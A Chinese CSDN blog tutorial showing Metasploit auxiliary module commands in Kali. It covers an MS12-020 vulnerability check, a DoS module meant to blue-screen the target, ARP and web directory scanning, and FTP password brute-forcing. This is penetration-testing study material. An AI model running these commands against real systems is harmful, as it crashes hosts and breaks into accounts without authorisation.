Kali——auxiliary(辅助模块)-metasploit工具module模块衍生

于 2024-03-07 17:51:10 发布
阅读量1k 收藏 21
点赞数 17
分类专栏: 网络安全 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63167128/article/details/136540338
版权
本文详细介绍了如何在KaliLinux中使用Metasploit的auxiliary模块进行漏洞检测、Dos攻击、网络扫描和FTP登录密码爆破。通过实际操作步骤和示例,读者可以学习如何在Windows系统上安装并运用Metasploit进行安全评估。
摘要由CSDN通过智能技术生成

介绍:本文是展示在Kali中通过使用metasploit工具的auxiliary辅助模块进行渗透测试的流程(也可以在windows系统中下载metasploit工具进行相关操作),工具详细教程可在Sangfor学习平台获取临时免费课程进行学习。

挂个链接:深信服产业教育中心

auxiliary(辅助模块)

路径目录:usr/share/metasploit-framework/modules/auxiliary

1.通过使用auxiliary模块中的check模块来进行漏洞检测,查看该主机是否存在该漏洞

示例:主机是否存在ms12-020漏洞

use auxiliary/scanner/rdp/ms12_020_check //使用ms_12_020_check模块

show options //查看该模块需要哪些参数

set RHOST ip address //设置目标主机IP地址

run //执行漏洞检测

出现以下结果,则证明目标主机存在该漏洞

2.通过使用maxchannelids模块利用漏洞进行dos(分布式拒绝服务)攻击

示例:通过上述检测出来存在的ms12-020漏洞进行利用,对该目标主机发动dos攻击使主机蓝屏死机

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids //使用ms12_020_maxchannelids模块

show options //查看该模块需要设置哪些参数

set RHOST ip address //设置目标主机IP地址

run //执行漏洞利用,发动dos攻击

成功后电脑会蓝屏或死机被dos攻击的现象

3.通过使用arp_sweep模块进行网络主机存活扫描

路径目录:../auxiliary/scanner/discovery/arp_sweep

use auxiliary/scanner/discovery/arp_sweep //使用arp_sweep模块

show options //查看该模块需要设置哪些参数

set RHOST ip address //设置目标主机IP地址

set thread 10 //把攻击线程数设置成10个

run //执行扫描

若出现appears to be up 则对应的目标主机当前处于存活状态

4.通过使用dir_scanner模块进行web目录扫描(和3流程类似)

路径目录:../auxiliary/scanner/http/dir_scanner

use auxiliary/scanner/http/dir_scanner //使用dir_scanner模块

show options //查看该模块需要设置哪些参数

set RHOST ip address //设置目标主机IP地址

set thread 10 //把攻击线程数设置成10个

run //执行扫描

扫描结果如下示例(这里扫描结果应该是扫出来了phpMyadmin的目录,响应码200证明真实性很大):

5.通过使用ftp_login模块进行FTP登录密码爆破

路径目录:auxiliary/scanner/ftp/ftp_login

use auxiliary/scanner/ftp/ftp_login //使用ftp_login模块

show options //查看该模块需要设置哪些参数

set USERNAME 用户名 //设置登录的用户名

set PASS FILE //usr/share/wordlist/fasttrack.txt 设置使用的密码爆破字典文本(这里用的是fastrack.txt)

set thread 20 //把攻击线程数设置成20个

run //执行扫描

爆破结果如下示例,出现Login Successful 以及登录密码则证明爆破成功,获取FTP登陆能力

——467
关注
  • 17
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kali linux 无线攻击——aircrack-ng-附件资源
03-05
kali linux 无线攻击——aircrack-ng-附件资源
L9-4-2021选做-ud-metasploit-kali1
08-08
L9-4-2021选做-ud-metasploit-kali1
kali-linux-auxiliary模块-指纹探测与口令猜解(详细)
weixin_44205564的博客
10-03 538
kali-linux-auxiliary模块-指纹探测与口令猜解
Metasploit穷举模块auxiliary
maverickpig的博客
02-15 566
msf的auxiliary模块,爆破扫描使用
Metasploit -- 辅助模块Auxiliary
weixin_41489908的博客
03-01 1436
就趁着春天吧,一点一点重新来过。。。 ---- 网易云热评 往期回顾 Metasploit -- 攻击载荷模块(Payloads)文字版 Metasploit -- 渗透攻击模块(exploit)文字版 Metasploit -- 扫描并分析主机(文字版) Metasploit -- 工作区操作(文字版) Metasploit -- 更新后报错处理(文字版) 作用:Metasploit辅助模块主要用于信息搜集阶段,功能包括扫描、口令猜解、敏感信息嗅探、FUZZ测试发掘漏洞、...
【MSFconsole进阶】auxiliary模块:信息收集、扫描、嗅探、指纹识别、口令猜测和Dos攻击等
05-22 4464
【渗透工具】MSFconsole:auxiliary模块
Metasploit——辅助模块(Auxiliary)
m0_62063669的博客
08-09 3368
简单网络管理协议(SNMP),由一组网络管理的标准组成,包含一个应用层协议、数据库模型和一组资源对象。/snmp/snmp_enum,如果能够获取只读(RO)或读/写(RW)权限的团体字符串,可以从中提取目标的补丁级别,运行的服务,用户名,持续运行时间,路由等信息。VNC:虚拟网络控制台,是一款优秀的远程控制工具软,基于 UNIX 和 Linux 操作系统的免费的开源软件,远程控制能力强大,高效实用。在使用之前,你需要先创建一个数据库连接用于存放扫描的数据、结果,然后加载wmap插件。...
kali-linux 工具Metasploit离线式攻击使用教程
最新发布
12-29
在IT安全领域,Kali Linux是一款著名的开源渗透测试操作系统,其中包含了各种安全工具,而Metasploit则是其中的重要组件之一,主要用于进行安全漏洞利用和红队演练。本教程将聚焦于Metasploit的离线攻击使用方法,这...
Metasploit终端下的辅助扫描工具 (auxiliary模块讲解)
Kevin's Blog
06-01 5974
辅助扫描工具主要用于网络攻防前期的踩点、信息搜集) 一、操作环境 虚拟机Kali(IP:192.168.1.92) # 为方便学习开启ssh端口 # 进入ssh配置文件 》》vi /etc/ssh/sshd_config 将#PasswordAuthentication no的注释去掉,并且将NO修改为YES (//kali中默认是yes) 将PermitRoot...
Auxiliary模块使用(三)
weixin_43047908的博客
03-20 1731
VNC空密码扫描程序   这个模板将会扫描特定的网段,以搜索可以使用空密码访问的虚拟网络计算(VNC)服务器。 旨在帮助了解辅助工具模板在渗透测试过程中的重要作用 msf5 > use auxiliary/scanner/vnc/vnc_none_auth msf5 auxiliary(scanner/vnc/vnc_none_auth) > show options Module options (auxiliary/scanner/vnc/vnc_none_auth): Nam
Metasploit - auxiliary/gather/censys_search
Nixawk
10-25 1130
msf > use auxiliary/gather/censys_search msf > set CENSYS_UID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX msf >set CENSYS_SECRET XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX msf >set CENSYS_DORK rapid7Certificates Sea
kali扫描辅助模块auxiliary结合nslookup和nmap进行扫描
pray030的博客
12-09 292
kali扫描辅助模块auxiliary结合nslookup和nmap进行扫描 实验准备 1.kali虚拟机(其自带扫描工具) 2.目标ip:124.160.64.224 cie.zjgsu.edu.cn 3.邮箱ip:124.160.64.1 ucmail.zjgsu.edu.cn 实验测试与结果 Telnet服务查点: use auxiliary/scanner/telnet/telnet_version ssh服务扫描: use auxiliary/scanner/ssh/ssh_vers
kali auxiliary扫描常用模块
weixin_43155143的博客
06-02 797
kali auxiliary扫描常用模块
auxiliary/scanner常见模块的含义
weixin_46044975的博客
12-07 2965
模块详解 名称:Wordpress Pingback定位器 模块:辅助/扫描仪/ http / wordpress_pingback_access 许可证:Metasploit框架许可证(BSD) 等级:正常 本模块将扫描使用Pingback API的wordpress网站 启用。通过与API接口,攻击者可能会导致 Wordpress网站端口扫描一个外部目标并返回结果。 请参考wordpress_pingback_portscanner模块。这个问题是 在wordpress ...
kali漏洞利用之Metasploit实战
热门推荐
The__Apollo的博客
04-22 2万+
Metasploit在渗透测试中经常被用到,实际上这套软件包括了很多工具,这些工具组成了一个完整的攻击框架。他们或许在渗透测试中的每一方面都不能称为最好用的工具,但组合起来的框架却让它变得强大。1.启动服务:在kali中使用metasploit,需要先开启PostgreSQL数据库服务和metasploit服务,然后就可以完整的利用msf数据库查询exploit和记录 2.路径介绍kali中,
metasploit怎么用? 基础(auxiliary、exploits、meterpreter)篇 (゚益゚メ) 渗透测试
寻觅的博客
02-05 2913
metasploit简介 metasploit具体是做什么用的百度上已经有很多解释了,这里就不在做过多赘述了,我们当前主要使用的metasploit版本是metasploit-framework,简称(MSF)此版本是metasploit的一个免费开源版本,并且被集成到了kali系统中,此版本纯命令行操作,下面我们使用也是此版本。此版本和专业版相比少了一些自动化和可视化的操作方法,便利性有所不如,但基础功能齐全。metasploit的更新频率很高,能达到周更的地步,所以很多新功能主要靠自己摸索。这里的使用只
Kali MSF命令模块最详细模块与利用解释整合
Sunspot
04-19 1845
稍后,如果另一个请求到达该 ISAPI 模块,则将使用先前获得的指针,从而导致访问冲突或潜在的任意代码执行。该模块发送格式错误的 TKEY 查询,该查询利用在受影响的 BIND9“命名”DNS 服务器上处理 TKEY 查询时的错误。由于BigIP会在第一个未经身份验证的请求后分配一个新会话,并且仅当访问策略超时时才删除该会话,因此攻击者可以通过重复发送初始HTTP请求并使会话处于挂起状态来耗尽所有可用的会话。POST 请求处理中的边界错误而存在的,其中应用程序输入设置为过长的文件名。
msf aux模块使用
Gjqhs的博客
03-07 1612
普及auxiliary模块的基本使用方法 简介 auxiliary辅助模块) 主要功能:执行扫描、嘎探、指纹识别等相关功能以辅助渗透测试。 与exploits模块的区别 exploits模块一般需要和payloads模块联合使用,通过exploits模块渗透成功后执行payloads模块中的代码。 auxiliary模块不需要和payloads模块联合使用 文件位置:/usr/share/metasploit-framework/modules/auxiliary auxiliary模块应用实例1
利用msf 对靶机metasploittable2 进行信息收集
枫梓林のBlog
04-20 1363
利用msf 对靶机metasploittable2 进行信息收集 文章目录利用msf 对靶机metasploittable2 进行信息收集测试环境信息统一收集1.使用netdiscover 扫描存活主机2.使用 Nmap 确认该目标主机3.使用zenmap 扫描开放端口 查找漏洞4.如上图这么多端口开放使用 Nessus 扫描该主机的漏洞一、基于 TCP 协议收集主机信息1.1 ARP 扫描1.2 使用半连接方式扫描TCP端口1.3 使用 auxiliary/sniffer 下的psnuffle 模块进行密
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值